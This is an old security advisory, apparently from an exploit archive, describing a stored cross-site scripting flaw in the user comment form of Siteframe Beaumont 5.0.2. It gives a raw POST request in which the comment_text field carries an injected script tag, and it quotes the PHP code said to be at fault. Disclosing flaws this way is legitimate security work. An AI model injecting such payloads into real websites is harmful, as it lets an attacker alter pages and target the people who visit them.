Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

2006.02.17
Credit: Kiki
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability #################################### Information of Software: Software: Siteframe Beaumont 5.0.1a Site: http://www.siteframe.org/ Description of software: Siteframe is a lightweight content-management system designed for the rapid deployment of community-based websites. With Siteframe,a group of users can share stories and photographs, create blogs, send email to one another, and participate in group activities. #################################### Bug: Siteframe contains a flaw that allows a remote cross site scripting attack. The vulnerability is found in the user comment page and the user can modify the function GET and insert the XSS code - http POST request http://[target]/edit/Comment POST /edit/Comment HTTP/1.1 Host: [target] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 167 comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co mment_subject=Kiki&comment_text=Hi&_submitted=1 but we can modify the request POST in this way: comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co mment_subject=Kiki&comment_text=<script>alert("lol");</script>&_submitte d=1 --------------------------------------------------------- Example: you can insert in the text post an XSS code or you can modify the request in this way: comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&co mment_subject=Kiki&comment_text=[XSS]&_submitted=1 --------------------------------------------------------- The bug is in this part of page.php [...] // get the comments if ($p->get('allow_comments')) // are comments allowed? { // display comments if (config('threaded_comments')) $clist = $p->get_threaded_comments(); else $clist = $p->get_comments(); $PAGE->assign('comments', $clist); $PAGE->assign('num_comments', count($clist)); // now, create a comment form $c = new Comment; $c->set('comment_page_id', $p->id()); $PAGE->assign('comment_form', $c->form()); } [...] #################################### Credit: Author: Kiki e-mail: federico.sana (at) alice (dot) it [email concealed] web page: http://kiki91.altervista.org ####################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top